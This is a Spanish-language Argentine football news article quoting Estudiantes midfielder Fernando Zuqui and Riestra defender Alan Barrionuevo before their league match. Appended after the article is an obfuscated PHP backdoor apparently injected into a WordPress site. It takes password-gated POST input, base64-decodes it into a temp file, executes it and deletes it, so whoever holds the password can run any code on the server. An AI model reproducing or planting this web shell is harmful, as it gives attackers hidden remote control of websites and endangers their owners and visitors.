Fernando Zuqui y Alan Barrionuevo hablaron del Estudiantes-Deportivo Riestra de la segunda fecha

Estudiantes y Deportivo Riestra, dos equipos que arrancaron con triunfos el Torneo 2024, se enfrentarán el lunes, a las 20 horas, en el estadio Uno Jorge Luis Hirschi, por la segunda fecha. Fernando Zuqui y Alan Barrionuevo, en las habituales conferencias de prensa organizadas por la Liga Profesional de Fútbol, hablaron sobre este cercano cotejo.

“Sentimos ser los últimos campeones, hace unos días, y eso nos potencia como grupo. Arrancamos un torneo nuevo y estamos preparados, ahora nuevamente se nos viene una seguidilla importante y tenemos que estar a la altura. Nos planteamos ir partido a partido, estamos pensando en ganar el lunes y después sumar la mayor cantidad de puntos en esta primera parte del año”, señaló Zuqui.

El volante del Pincha insistió: “Un club como Estudiantes te exige competir y estar en el alto nivel. Ahora pensamos en el partido del lunes, que va a ser difícil ante un rival que sabemos las ideas que tiene para jugar, es un equipo aguerrido y después pensar más adelante en lo que será el partido de Copa Libertadores para clasificar”.

Barrionuevo aseguró que “nuestro objetivo principal es permanecer en la categoría, estamos enfocados en ellos. El plantel está bien, convencido que puede quedarse, se trabaja día a día. En nuestra cancha nos hacemos fuertes, de visitantes nos costando un poco y estamos trabajando en eso. El lunes se viene una posibilidad para tratar de mejorar”.

Sobre el partido ante Estudiantes, el defensor de Deportivo Riestra respondió que “Ellos van bien por afuera y tienen buenos delanteros, veremos como contrarrestar eso. Tienen muchos jugadores de jerarquía. Después, en la cancha la cosa puede ir variando”. Sobre las críticas que recibe su equipo dijo: “Nos pegan pegan mucho, pero eso no influye ni nos afecta. Nosotros nos dedicamos a lo futbolístico”.

Barrionuevo, surgido de Almirante Brown y con debut en la categoría máxima en Central Córdoba, marcó las diferencias entre el fútbol de ascenso y de la Liga: “Se juega mucho mas dinámico y más rápido, es menos aguerrido pero nosotros nos sentimos cómodos con el sistema de juego que es aguerrido. No cambia lo que juega ahora Riestra, con lo que jugábamos en el ascenso, pero sí se nota en los rivales”.

Eros Mancuso, que estuvo junto a Tiago Palacios en el choque contra el surtidor de una estación de servicio, horas después de la coronación de Estudiantes en la final de la Copa Argentina subió a su cuenta de Instagram un repudiable posteo con una foto con dos compañeros y emojis, uno de ellos de un surtidor de nafta.

Consultado por este tema, Zuqui respondió: “Es un tema del que no quiero opinar mucho. Todos cometemos errores, no sólo en el fútbol sino también en la vida, y lo importante es darse cuenta y no volver a hacerlo”.

Tras debut del pibe Mateo Apolonio, de apenas 14 años, ayer en el partido ante Newell’s Old Boys (que ganó 1-0) por la Copa Argentina, Barrionuevo manifestó que “es el capitán de la novena, venía entrenando con la reserva como otros juveniles, no es el único. Es un gran chico, tiene mucha dinámica y se le abrió la puerta en la Primera. Mi consejo es que esté tranquilo, que haga lo hace en su categoría y que disfrute, que nunca deje de disfrutar”.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}